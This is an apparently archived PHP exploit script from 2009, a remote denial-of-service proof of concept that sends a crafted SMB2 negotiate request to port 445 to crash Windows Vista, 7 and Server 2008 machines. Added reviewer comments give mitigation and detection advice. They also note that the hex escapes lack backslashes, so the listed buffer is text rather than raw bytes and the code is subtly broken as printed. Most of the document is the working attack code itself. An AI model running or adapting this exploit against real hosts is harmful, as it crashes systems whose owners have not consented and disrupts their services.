
lame-smb-bsod.txt

Posted on 10 September 2009

<?php
/*
 * Lame Windows Vista / Windows 7 / Win2k8 R1 SP2+updates and beta R2 :
 * SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote BSOD
 *
 * Author: Ricardo Almeida
 * email:  ricardojba[at]aeiou[DoT]pt
 *
 * Credits: http://seclists.org/fulldisclosure/2009/Sep/0039.html (exploit ported to PHP)
 *
 * Reviewer notes (defensive context):
 *  - What this is: a denial-of-service proof of concept. It opens one TCP
 *    connection to port 445 of the host given on the command line, writes a
 *    single fixed buffer, and closes the socket. No authentication step is
 *    involved anywhere in the script.
 *  - Listing fidelity: the hex escapes in the buffer below are reproduced
 *    exactly as printed on this page, i.e. without backslashes, so PHP treats
 *    them as plain ASCII text ("x00x00...") rather than as raw bytes.
 *  - What the hex values describe: the 0xff 'S' 'M' 'B' marker and the 0x72
 *    command byte, followed by a dialect list that spells
 *    "PC NETWORK PROGRAM 1.0", "LANMAN1.0", "Windows for Workgroups 3.1a",
 *    "LM1.2X002", "LANMAN2.1", "NT LM 0.12" and "SMB 2.002" - a negotiate
 *    request that offers the SMB2 dialect, matching the title above.
 *  - Mitigation: install the vendor fix for the SMB2 negotiate issue named in
 *    the title on every affected system; until then keep TCP 445 unreachable
 *    from untrusted networks. Disabling SMBv2 was the usual interim
 *    workaround - confirm against the vendor advisory for the exact platform.
 *  - Detection: unexpected bugchecks / reboots of file servers that coincide
 *    with inbound connections to 445 from hosts that do not normally speak
 *    SMB to them are worth correlating in host and network logs.
 */

// Exactly one argument (the target host) is required.
if ($argc != 2) {
    exit("Usage: lame-smb-bsod.php <host> ");
}

$host = $argv[1];

// Fixed request buffer, assembled from the same fragments as the original
// listing (strings kept byte-for-byte as printed on the page).
$request = implode('', [
    // framing and header fields
    "x00x00x00x90",
    "xffx53x4dx42",
    "x72x00x00x00",
    "x00x18x53xc8",
    "x00x26",
    "x00x00x00x00x00x00x00x00x00x00xffxffxffxfe",
    // remaining header fields, then the dialect list
    "x00x00x00x00x00x6dx00x02x50x43x20x4ex45x54",
    "x57x4fx52x4bx20x50x52x4fx47x52x41x4dx20x31",
    "x2ex30x00x02x4cx41x4ex4dx41x4ex31x2ex30x00",
    "x02x57x69x6ex64x6fx77x73x20x66x6fx72x20x57",
    "x6fx72x6bx67x72x6fx75x70x73x20x33x2ex31x61",
    "x00x02x4cx4dx31x2ex32x58x30x30x32x00x02x4c",
    "x41x4ex4dx41x4ex32x2ex31x00x02x4ex54x20x4c",
    "x4dx20x30x2ex31x32x00x02x53x4dx42x20x32x2e",
    "x30x30x32x00",
]);

$sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
$result = socket_connect($sock, $host, 445);

if ($result !== false) {
    echo " Connected to $host ";
} else {
    // $result is false here, so "($result)" prints as "()".
    echo "Connect failed. Reason: ($result) " . socket_strerror(socket_last_error($sock)) . " ";
}

// As in the original listing, the lines below run whether or not the
// connect succeeded; only the two status messages above are conditional.
echo "Bye, Bye Windowz.... ";
socket_write($sock, $request, strlen($request));
socket_close($sock);

// The original post ended with the author's webmail provider footer
// ("Venha conhecer o novo AEIOU: http://www.aeiou.pt"); it is not part of the script.

 
